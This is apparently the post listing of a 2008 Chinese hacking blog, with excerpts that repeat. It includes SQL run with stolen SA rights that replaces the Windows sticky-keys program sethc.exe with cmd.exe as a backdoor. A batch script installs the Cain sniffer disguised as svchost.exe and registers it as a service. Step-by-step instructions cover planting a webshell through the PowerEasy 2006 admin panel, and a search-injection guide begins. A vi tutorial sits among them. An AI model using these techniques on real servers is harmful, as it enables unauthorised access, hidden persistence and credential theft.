View Mode: Normal | Article List
查询分析器中替换粘滞键后门
[ 2008-08-19 17:34:29 | Author: GrayDream ]
如果我们获得了SA权限的服务器,可以通过查询分析器连接到数据库中,然后执行下面的SQL语句,就可以成功将cmd.exe 替换粘滞键程序^_^
Quote
declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out;
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\cmd.exe' ,'c:\windows\system32\sethc.exe';
exec sp_oacreate 'scripting.filesystemobject',@o out;
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\cmd.exe' ,'c:\windows\system32\sethc.exe';
打造绿色版的Cain
[ 2008-08-04 11:56:46 | Author: GrayDream ]
所用到的文件一共是五个,分别为:
Cain.exe
npf.sys
packet.dll
wanpacket.dll
wpcap.dll
将以上五个文件提取出后放在一个文件夹下,编写批处理文件install.bat ,内容如下:
@echo off
set SysDir=%SYSTEMROOT%\System32\
copy packet.dll %SysDir%\packet.dll /y
copy wpcap.dll %SysDir%\wpcap.dll /y
copy wanpacket.dll %SysDir%\wanpacket.dll /y
copy cain.exe %SysDir%\ras\svchost.exe /y
copy npf.sys %SysDir%\drivers\npf.sys /y
sc create ...
Read More...
Cain.exe
npf.sys
packet.dll
wanpacket.dll
wpcap.dll
将以上五个文件提取出后放在一个文件夹下,编写批处理文件install.bat ,内容如下:
@echo off
set SysDir=%SYSTEMROOT%\System32\
copy packet.dll %SysDir%\packet.dll /y
copy wpcap.dll %SysDir%\wpcap.dll /y
copy wanpacket.dll %SysDir%\wanpacket.dll /y
copy cain.exe %SysDir%\ras\svchost.exe /y
copy npf.sys %SysDir%\drivers\npf.sys /y
sc create ...
Read More...
动易2006后台拿Webshell方法
[ 2008-06-07 10:23:28 | Author: GrayDream ]
针对版本:PowerEasy2006 SP6
进入后台后,我们在左边菜单栏中选择“系统设置”,然后在出现的菜单栏里选择“自定义页面管理”,接着需要先添加一个自定义页面分类,选择“添加自定义分类”这个选项,分类名称与分类简介都可以随便填写。填写完毕后选择“添加”,系统提示添加成功。下面再来选择“添加自定义页面”,“页面名称”随便输入,“所属分类”就是刚才建立的分类就可以了。“页面类型”和“页面路径”都不用管,保持默认,不过如果没有改页面路径的话,默认生成的文件是在根目录下的,也就是http://www.xx.com/muma.asp.“文件名称”即输入生成的木马的文件名。建议起的有诱惑力一些。“页面简介”也不用管,下面就是页面内容了。这里填入小马的代码。一切完毕点击“添加”会提示保存自定义页面成功。最后一步是要生成我们的木马页面。选择“自定义页面管理首页”,点击右边出现的“生成本页”。就OK 了。至此,成功获得动易2006SP6的Webshell
进入后台后,我们在左边菜单栏中选择“系统设置”,然后在出现的菜单栏里选择“自定义页面管理”,接着需要先添加一个自定义页面分类,选择“添加自定义分类”这个选项,分类名称与分类简介都可以随便填写。填写完毕后选择“添加”,系统提示添加成功。下面再来选择“添加自定义页面”,“页面名称”随便输入,“所属分类”就是刚才建立的分类就可以了。“页面类型”和“页面路径”都不用管,保持默认,不过如果没有改页面路径的话,默认生成的文件是在根目录下的,也就是http://www.xx.com/muma.asp.“文件名称”即输入生成的木马的文件名。建议起的有诱惑力一些。“页面简介”也不用管,下面就是页面内容了。这里填入小马的代码。一切完毕点击“添加”会提示保存自定义页面成功。最后一步是要生成我们的木马页面。选择“自定义页面管理首页”,点击右边出现的“生成本页”。就OK 了。至此,成功获得动易2006SP6的Webshell
Linux下VI使用收藏
[ 2008-04-12 17:10:27 | Author: GrayDream ]
vi的使用之汇总
功能最强在的编辑器——vi
vi是所有UNIX系统都会提供的屏幕编辑器,它提供了一个视窗设备,通过它可以编辑文件。当然,对UNIX系统略有所知的人,或多或少都觉得vi超级难用,但vi是最基本的编辑器,所以希望读者能好好把它学起来,以后在UNIX世界里必将畅行无阻、游刃有余,因为其他几种文本处理器并非UNIX标准配备。说不定别人的Linux机器没安装joe或pico,如果您不会vi,那您可能就没辄了。
vi的基本概念
基本上vi可分为三种操作状态,分别是命令模式(Command mode)、插入模式(Insert mode)和底线命令模式(Last line mode),各模式的功能区分如下:
1. Comand mode:控制屏幕光标的移动,字符或光标的删除,移动复制某区段及进入Insert mode下,或者到Last line mode。
...
Read More...
功能最强在的编辑器——vi
vi是所有UNIX系统都会提供的屏幕编辑器,它提供了一个视窗设备,通过它可以编辑文件。当然,对UNIX系统略有所知的人,或多或少都觉得vi超级难用,但vi是最基本的编辑器,所以希望读者能好好把它学起来,以后在UNIX世界里必将畅行无阻、游刃有余,因为其他几种文本处理器并非UNIX标准配备。说不定别人的Linux机器没安装joe或pico,如果您不会vi,那您可能就没辄了。
vi的基本概念
基本上vi可分为三种操作状态,分别是命令模式(Command mode)、插入模式(Insert mode)和底线命令模式(Last line mode),各模式的功能区分如下:
1. Comand mode:控制屏幕光标的移动,字符或光标的删除,移动复制某区段及进入Insert mode下,或者到Last line mode。
...
Read More...
搜索型注入的基本判断
[ 2008-04-09 11:53:44 | Author: GrayDream ]
很早的时候就已经流行开来了。只是又有朋友总是问我,如何进行搜索型的注入,该填写什么注入语句进行测试。今天就再记录一下。
既然是搜索型注入,肯定首先是要找网页中具有搜索的地方。一般如果他的ASP文件如下所示,就可以进行提交注入语句了:
Read More...
既然是搜索型注入,肯定首先是要找网页中具有搜索的地方。一般如果他的ASP文件如下所示,就可以进行提交注入语句了:
<%
key = request("key")
otype = request("otype")
if key = "" then
response.write "<scrfipt>alert('查询字符串不能为空!');history.back();</script>"
resopnse.end
end if
%>
……(省略中间代码)
<%
Set rs = Server.CreateObject("ADODB.Recordset")
if otype = "title" then
...key = request("key")
otype = request("otype")
if key = "" then
response.write "<scrfipt>alert('查询字符串不能为空!');history.back();</script>"
resopnse.end
end if
%>
……(省略中间代码)
<%
Set rs = Server.CreateObject("ADODB.Recordset")
if otype = "title" then
Read More...
